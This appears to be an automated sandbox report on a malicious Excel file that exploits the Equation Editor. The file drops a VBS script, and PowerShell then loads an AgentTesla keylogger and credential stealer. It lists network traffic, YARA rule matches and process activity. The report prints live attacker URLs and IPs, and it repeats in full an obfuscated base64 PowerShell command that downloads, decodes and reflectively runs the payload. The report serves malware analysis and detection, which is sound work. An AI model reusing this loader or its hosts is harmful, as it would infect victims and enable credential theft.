                  Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /NIGHTTTTMPDW-constraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.13Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /madamwebaaaaa.txt HTTP/1.1Host: 107.172.31.13Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: drive.google.com
                  Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: EQNEDT32.EXE, 00000002.00000002.471753708.000000000026F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.13/NIGHTTTTMPDW-constraints.vbs
                  Source: EQNEDT32.EXE, 00000002.00000002.472683807.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.13/NIGHTTTTMPDW-constraints.vbsj
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: AddInProcess32.exe, 00000009.00000002.628239471.000000000244C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002430000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: powershell.exe, 00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.627062305.000000000095C000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002430000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: wscript.exe, 00000005.00000003.471806519.0000000002B12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.472214860.0000000002B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
                  Source: powershell.exe, 00000006.00000002.571025263.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.520246237.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002430000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: powershell.exe, 00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: powershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000008.00000002.519947637.0000000000330000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.519947637.0000000000383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
                  Source: powershell.exe, 00000008.00000002.520246237.000000000242B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                  Source: powershell.exe, 00000008.00000002.520246237.000000000242B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.524750374.0000000004FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
                  Source: powershell.exe, 00000008.00000002.520246237.000000000256C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                  Source: powershell.exe, 00000008.00000002.520246237.000000000256C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                  Source: powershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, cPKWk.cs.Net Code: VG0StEU

                  System Summary

                  barindex
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.powershell.exe.723ab28.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.powershell.exe.723ab28.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00312C888_2_00312C88
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00311F1D8_2_00311F1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_001D38E89_2_001D38E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_001D49089_2_001D4908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_001DEBF89_2_001DEBF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_001DB4309_2_001DB430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_001D3C309_2_001D3C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_005E10C89_2_005E10C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_005E40B89_2_005E40B8
                  Source: transferencia interbancaria_66579.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2318
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2318Jump to behavior
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.powershell.exe.723ab28.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.powershell.exe.723ab28.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 8.2.powershell.exe.723ab28.0.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/10@3/4
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$transferencia interbancaria_66579.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9108.tmpJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.....4.......<.......|........W.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P.....4.......<.......|.......!W.........................s............................................Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: transferencia interbancaria_66579.xlam.xlsxReversingLabs: Detection: 63%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8u